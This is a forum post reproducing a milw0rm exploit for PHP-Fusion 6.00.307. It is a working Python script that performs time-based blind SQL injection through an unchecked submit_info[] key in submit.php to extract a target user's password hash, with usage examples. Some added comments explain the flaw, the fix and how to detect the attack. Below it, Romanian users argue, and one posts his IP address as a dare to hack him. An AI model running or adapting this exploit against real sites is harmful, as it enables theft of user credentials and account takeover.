
PHP-Fusion 6.00.307 Remote Blind SQL Injection Exploit


#!/usr/bin/python

"""

#=================================================================================================#

# ____ __________ __ ____ __ #

# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #

# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #

# | | | \ | |/ \ \___| | /_____/ | || | #

# |___|___| /\__| /______ /\___ >__| |___||__| #

# \/\______| \/ \/ #

#=================================================================================================#

# This was a priv8 Exploit #

#=================================================================================================#

# PHP-Fusion 6.00.307 #

# And Probably All Other Versions #

# Blind Sql Injection Vulnerability #

# Benchmark Method #

#====================================#===========#====================================#===========#

# Server Configuration Requirements # # Some Information # #

#====================================# #====================================# #

# # #

# magic_quotes_gpc = 0 # Vendor: php-fusion.co.uk #

# # Author: The:Paradox #

#================================================# Severity: Moderately Critical #

# # #

# Oh wow no-content space! Enjoy it! # Proud To Be Italian. #

# # #

#====================================#===========#================================================#

# Proof Of Concept / Bug Explanation # #

#====================================# #

# PHP-Fusion presents a critical vulnerability in the submit.php page. Let's look at the source: #

#=================================================================================================#

[submit.php]

1. if ($stype == "l") {

2.

3. if (isset($_POST['submit_link'])) {

4.

5. if ($_POST['link_name'] != "" && $_POST['link_url'] != "" && $_POST['link_description'] != "") {

6. $submit_info['link_category'] = stripinput($_POST['link_category']);

7. $submit_info['link_name'] = stripinput($_POST['link_name']);

8. $submit_info['link_url'] = stripinput($_POST['link_url']);

9. $submit_info['link_description'] = stripinput($_POST['link_description']);

10. $result = dbquery("INSERT INTO ".$db_prefix."submissions (submit_type, submit_user, submit_datestamp, submit_criteria) VALUES ('l', '".$userdata['user_id']."', '".time()."', '".serialize($submit_info)."')");

#=================================================================================================#

# Look to the sql query. #

# There are two variables: $userdata['user_id'] and a serialized array $submit_info. #

# The user_id is an intval value and array values link_category, link_name, link_url and #

# link_description are correctly cleaned via fusions' stripinput() function. #

# #

# All seems pretty cleaned. #

# But what would happen if we set another value into submit_info[] array via gpc vars? #

# It will be set in the serialized array, and obviously it will not be checked by stripinput. #

# Sql Injection possibility! #

# #

# Let's see: #

# #

# Host: 127.0.0.1 #

# POST PHP-Fusion/submit.php?stype=l #

# link_category=1 link_name=1 link_url=1 link_description=1 submit_info[paradox]=' submit_link=1 #

# #

# It will result in sql error in case of Mq = 0 : #

# #

# You have an error in your SQL syntax; check [...] #

# #

#=================================================================================================#

# Normally, to make this trick work, register_globals = 1 is needed, but php-fusion uses #

# extract() to simulate register_globals when it is set to 0. #

#=================================================================================================#

# Use this at your own risk. You are responsible for your own deeds. #

#=================================================================================================#

# Python Exploit Starts #

#=================================================================================================#

"""

from httplib import HTTPConnection

from urllib import urlencode

from time import time

from sys import exit, argv, stdout

from md5 import new

# Usage banner.  The whole script is Python 2 (print statement, httplib,
# urllib.urlencode, the long-removed `md5` module); it does not run unmodified
# on Python 3.
print """

#=================================================================#

# PHP-Fusion v6.00.307 #

# And Probably All Other Versions #

# Blind Sql Injection Vulnerability #

# Benchmark Method #

# #

# Discovered By The:Paradox #

# #

# Usage: #

# ./fusiown [Target] [Path] [ValidId] [ValidPass] [TargetUserid] #

# #

# Example: #

# ./fusiown localhost /phpfusion/ 40 s3cr3t 1 #

# ./fusiown www.host.org / 791 myp4ssw0rd 1 #

#=================================================================#

"""

# Argument handling: target host, application path, the id and password of an
# account the request below logs in as (through the fusion_user cookie), and
# the user_id whose password hash is to be inferred.
# Note the check is `<= 5`: exactly five positional arguments are required, and
# a short command line exits silently without printing a usage message.
if len(argv)<=5: exit()
else: print "[.]Exploit Starting."

prefix = "fusion_"        # PHP-Fusion's default table prefix; hard-coded, not detected
benchmark = "230000000"   # iteration count handed to MySQL BENCHMARK(); the delay it causes is the only signal
vtime = 6                 # seconds: a response slower than this is read as "condition true"
port = 80                 # plain HTTP only; no TLS
target = argv[1]
path = argv[2]
cuid = argv[3]
cpass = argv[4]
uid = argv[5]
j=1          # 1-based position within the 32-character hex digest being recovered
h4sh = ""    # characters recovered so far (accumulated but never printed as a whole)
# Candidate byte values tried in order at each position: '0'-'9' (48..57) then
# 'a'-'f' (97..102).  The trailing 0 is a sentinel meaning "no candidate matched".
ht = []
for k in range(48,58):
    ht.append(k)
for k in range(97,103):
    ht.append(k)
ht.append(0)

def calc_md5(p):
    """Return the hex MD5 digest of *p* (Python 2 `md5` module).

    The digest is used verbatim as the second half of the fusion_user cookie
    sent by the main loop, i.e. the session cookie carries an unsalted MD5 of
    the account password.  Any leak of that cookie (logs, proxies, plain HTTP
    as used here) therefore exposes an offline-crackable password hash.
    """
    hash = new()   # shadows the builtin `hash`
    hash.update(p)
    return hash.hexdigest()

print "[.]Blind Sql Injection Starts.\n\nHash:"
# Time-based blind inference, one hex character per outer iteration.  For each
# position j the candidates in ht are tried until one makes the server answer
# slower than vtime seconds; the injected IF() only runs BENCHMARK() when the
# guessed character is correct, so latency is the whole side channel.
#
# Root cause (see the header): submit.php serializes the request-controlled
# $submit_info array into an INSERT without escaping keys it did not expect.
# Mitigation is a parameterized query plus an allow-list of array keys rather
# than serializing whatever the client supplied.  From the server side this
# traffic is easy to spot: repeated POSTs to submit.php with SQL keywords
# (SELECT/IF/BENCHMARK) inside a submit_info[...] field, each taking ~vtime
# seconds, up to 16 probes per character over 32 characters.
while j <= 32:
    for i in ht:
        if i == 0: exit('[-]Exploit Failed.\n')   # sentinel reached: no candidate matched at this position
        start = time()
        conn = HTTPConnection(target,port)   # a fresh connection per probe; never closed explicitly
        # Condition on one character of <prefix>users.user_password; the
        # trailing `#` comments out the remainder of the original INSERT.
        inj = "' OR (SELECT IF((ASCII(SUBSTRING(user_password," + str(j) + ",1))=" + str(i) + "),benchmark(" + benchmark + ",CHAR(0)),0) FROM " + prefix + "users WHERE user_id=" + uid + "))# BH > WH"
        # The payload rides in an extra submit_info[] key that stripinput()
        # never sees.  The Cookie header is "<user_id>.<md5(password)>", which is
        # presumably the form PHP-Fusion accepts as a logged-in session.
        conn.request("POST", path + "submit.php?stype=l", urlencode({'link_category': '1', 'link_name': '1', 'link_url': '1', 'link_description': '1', 'submit_link' : 'Submit+Link', 'submit_info[cGd0MQ==]' : inj }), {"Accept": "text/plain", "Content-Type" : "application/x-www-form-urlencoded","Cookie": "fusion_user=" + cuid + "." + calc_md5(cpass) + ";"})
        response = conn.getresponse()
        read = response.read()   # body is read but never inspected; only the timing matters
        if response.status == 404: exit('[-]Error 404. Not Found.')
        now = time()
        # Wall-clock threshold: network jitter or server load above vtime yields
        # a wrong character, and there is no confirmation probe or retry.
        if now - start > vtime:
            stdout.write(chr(i))
            stdout.flush()
            h4sh += chr(i)
            j += 1
            break;
print "\n\n[+]All Done.\n-=Paradox Got This One=-"

# milw0rm.com [2008-04-19]

Crezi ca avem nevoie de exploituri de pe millworm copiate aici?

Ia numai face pe adminu aici si lasa-l in pace.Daca ce a facut e gresit atunci un admin v-a lua o decizie,nu tu,parerea ta nu conteaza in aceste cazuri.


:))))))

Hecare nici tie nu ti-a cerut nimeni parerea cand ai postat(spammer).

Asa e am un mare noroc ca altfel imi spargeai parola de mess si imi dadeai format la PC ...

Astept sa ma hecaresti

Ip meu : 86.126.116.204 (poate sa iti confirme un admin daca nu crezi ca e cel real)

Si inca ceva ..cum zicea BanKai ... Variantele ca cel cu un nume de tip numeX,Xnume etc sa fie ratat sunt de 99%...si tu faci parte din acea parte.Astept sa ma ataci..dupa ce o sa imi inchid PC si o sa ma bag sub pat de frica...


:-j ...nu ma intereseaza ce crezi tu despre mine...nu-mi pasa...oricum eu astept sa ma hecaresti..

EL:

nu vreau sa incepem cearta/razboi sau cum vrei sa-i zici...oricine poate sa se certe..dar daca vrei ne certam blabla,asta facem...dar nu aici.
